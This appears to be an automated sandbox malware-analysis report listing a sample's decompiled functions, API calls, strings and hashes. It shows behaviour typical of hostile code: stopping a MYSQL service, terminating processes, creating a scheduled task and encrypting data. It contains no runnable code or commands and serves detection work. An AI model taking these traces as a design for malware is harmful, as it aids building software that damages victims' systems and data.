                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F8000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: c577e64be3e685c8f1fae661ad5e0db172a01d17fca8a3074cfeac0e71234826
                                                                                                                                                                        • Instruction ID: 154d7d7d638e415389d380096993303cee3f91998f07c57635cb465527f1e5c2
                                                                                                                                                                        • Opcode Fuzzy Hash: c577e64be3e685c8f1fae661ad5e0db172a01d17fca8a3074cfeac0e71234826
                                                                                                                                                                        • Instruction Fuzzy Hash: 26C18D7172020DDBDB18CF08C881A7EF7AAEF44784B244939EA55CB381DB70ED658B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EDAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 002EDAEB
                                                                                                                                                                        • CoCreateInstance.OLE32(003B4F6C,00000000,00000001,003B4F3C,?,?,003AA948,000000FF), ref: 002EDB0B
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 002EDBD6
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,003AA948,000000FF), ref: 002EDBE3
                                                                                                                                                                        • _memset.LIBCMT ref: 002EDC38
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 002EDC92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                                        • API String ID: 330603062-1376107329
                                                                                                                                                                        • Opcode ID: 907bbf4eb49879eec109fcade3c8523658851d36e077c50c48ec2a4997508235
                                                                                                                                                                        • Instruction ID: 5331ce028d9586329303d145c06d1eeaa0ccd120d76d12ee9d6a8a0f3ce3887b
                                                                                                                                                                        • Opcode Fuzzy Hash: 907bbf4eb49879eec109fcade3c8523658851d36e077c50c48ec2a4997508235
                                                                                                                                                                        • Instruction Fuzzy Hash: D9512370A40249AFCB00DF94CC89FEEBBB9FF48705F108558F505AB291DBB5A945CB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F1A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 002F1A1D
                                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 002F1A32
                                                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 002F1A46
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 002F1A5B
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 002F1A75
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 002F1A80
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 002F1A9E
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 002F1AA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                        • String ID: MYSQL
                                                                                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                                                                                        • Opcode ID: a8825cda153daeba627715b837b90a212e76ff79e9a098eb65d566c1e96a10dd
                                                                                                                                                                        • Instruction ID: 32478aa1664ed195db135730ed0c49941cf10952b985547e087a0c1b1467ae42
                                                                                                                                                                        • Opcode Fuzzy Hash: a8825cda153daeba627715b837b90a212e76ff79e9a098eb65d566c1e96a10dd
                                                                                                                                                                        • Instruction Fuzzy Hash: 37117335A1121EEBDB219F959D48FBFB7ACEB46791F440120FB01E2140DB64DD65CAA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00303576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 003035B1
                                                                                                                                                                          • Part of subcall function 00305208: __getptd_noexit.LIBCMT ref: 00305208
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0030364A
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00303680
                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0030369D
                                                                                                                                                                        • __allrem.LIBCMT ref: 003036F3
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030370F
                                                                                                                                                                        • __allrem.LIBCMT ref: 00303726
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00303744
                                                                                                                                                                        • __allrem.LIBCMT ref: 0030375B
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00303779
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                                                        • Opcode ID: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                                                                                        • Instruction ID: 9b21dffb4f51b1d65a8e951b7d7471f02874f266c593f8649ade9df3480b6e8d
                                                                                                                                                                        • Opcode Fuzzy Hash: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                                                                                        • Instruction Fuzzy Hash: 36712EF1A02716ABD716DF79CCA1B6AB3ACAF05724F14423AF514DB6C1E770DA408B90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00345480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 003454C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 003454D4
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 003454F7
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00345503
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00345531
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0034555B
                                                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 003455F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                                                                                        • Opcode ID: 2c0b54c434720f3abb0db167bfa362af320f4b85d58fe3954306bdc189b0a3c2
                                                                                                                                                                        • Instruction ID: 6af3b4f560302da2b0a30048e966c9b378e96899cb6dfa73cbef6d045bdd0c23
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c0b54c434720f3abb0db167bfa362af320f4b85d58fe3954306bdc189b0a3c2
                                                                                                                                                                        • Instruction Fuzzy Hash: F4513C35F80604BBEB236B649C43FBF76A9AF46B11F054165FA02AE1C2D6616D0187A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00305B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 790675137-0
                                                                                                                                                                        • Opcode ID: 295d3a1d777dce5768e7df061f5dd73bd64159163807c710346c585daf3efc9d
                                                                                                                                                                        • Instruction ID: 19d81fea3782346f4577f097796f319638932aa1bb348d983145af8701acc7a9
                                                                                                                                                                        • Opcode Fuzzy Hash: 295d3a1d777dce5768e7df061f5dd73bd64159163807c710346c585daf3efc9d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E41F472502704AFDB13AFA49CA2B9F77E8AF04314F10452EF5149E1C2DB755A40CF11
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002F2440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 002F244F
                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002F2469
                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002F24A1
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 002F24B0
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002F24B7
                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 002F24C1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002F24CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                        • String ID: cmd.exe
                                                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                                                        • Opcode ID: 271c9c9cfb2a1e16bfd042d2c3d8c8cfe16c6832ed8bfac4a329b9325778b442
                                                                                                                                                                        • Instruction ID: dc9c69c9f12f8b678e1c7070edf739cc110d8b691ae40b62abaa144d7cdd70c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 271c9c9cfb2a1e16bfd042d2c3d8c8cfe16c6832ed8bfac4a329b9325778b442
                                                                                                                                                                        • Instruction Fuzzy Hash: 8101B53561121ABBE722ABA0AC89FBE776CDB0A754F000160FE08D2181E77489448AB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002EF310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75B04E90), ref: 002EF338
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 002EF353
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                                                        • Opcode ID: 18301e9f432d51b1bdc7d3bba65eec8e949cae07d4c84f97d96efaabcc680c44
                                                                                                                                                                        • Instruction ID: 3aaadec839b4594835a8c49dc1c3f9b7cb9112e2505ab8536903e92bdbe161da
                                                                                                                                                                        • Opcode Fuzzy Hash: 18301e9f432d51b1bdc7d3bba65eec8e949cae07d4c84f97d96efaabcc680c44
                                                                                                                                                                        • Instruction Fuzzy Hash: 13C18970D1124DEBDF01DFA4DD59BDEBBB9AF14308F604029E805BB190E7B59A28CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 002ECBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                                                        • Opcode ID: f1078b5e5591730908a8a0fe6583491c9c947dd7c41dcd31b53b32f144637a37
                                                                                                                                                                        • Instruction ID: 8fe0c79275c5fb66c6375b03eae8a726a64eaec817847142947a280160674025
                                                                                                                                                                        • Opcode Fuzzy Hash: f1078b5e5591730908a8a0fe6583491c9c947dd7c41dcd31b53b32f144637a37
                                                                                                                                                                        • Instruction Fuzzy Hash: 05A17FB1C0028DDBEF11EFE4CC5ABDEBB74AF15314F540028E5057A282E7B65659CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00343350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000002.00000002.2901975039.00000000002E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902346871.00000000003EA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902391044.00000000003EC000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.00000000003FA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902435873.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000002.00000002.2902566940.000000000040B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_2_2_2e0000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                                                        • Opcode ID: d7f27d89726a405416617edc8d1f0b63d760eca0c8f2ca2273eb65b203304298
                                                                                                                                                                        • Instruction ID: d0cafd60f3e7e0ba349274d408440f93ebc154acaccb02233898d855b3ed7ef3
                                                                                                                                                                        • Opcode Fuzzy Hash: d7f27d89726a405416617edc8d1f0b63d760eca0c8f2ca2273eb65b203304298
                                                                                                                                                                        • Instruction Fuzzy Hash: 08414A65BC835129F733692ABC03FD663C54B51B10F090829F688EF2C3E785A9574351
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 003106EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___unDName.LIBCMT ref: 0031071B
                                                                                                                                                                        • _strlen.LIBCMT ref: 0031072E
                                                                                                                                                                        • __lock.LIBCMT ref: 0031074A
                                                                                                                                                                        • _malloc.LIBCMT ref: 0031075C
                                                                                                                                                                        • _malloc.LIBCMT ref: 0031076D
                                                                                                                                                                        • _free.LIBCMT ref: 003107B6
                                                                                                                                                                          • Part of subcall function 003042FD: IsProcessorFeaturePresent.KERNEL32(00000017,003042D1,00000000,?,?,?,?,?,003042DE,00000000,00000000,00000000,00000000,00000000,0030981C), ref: 003042FF
                                                                                                                                                                        • _free.LIBCMT ref: 003107AF
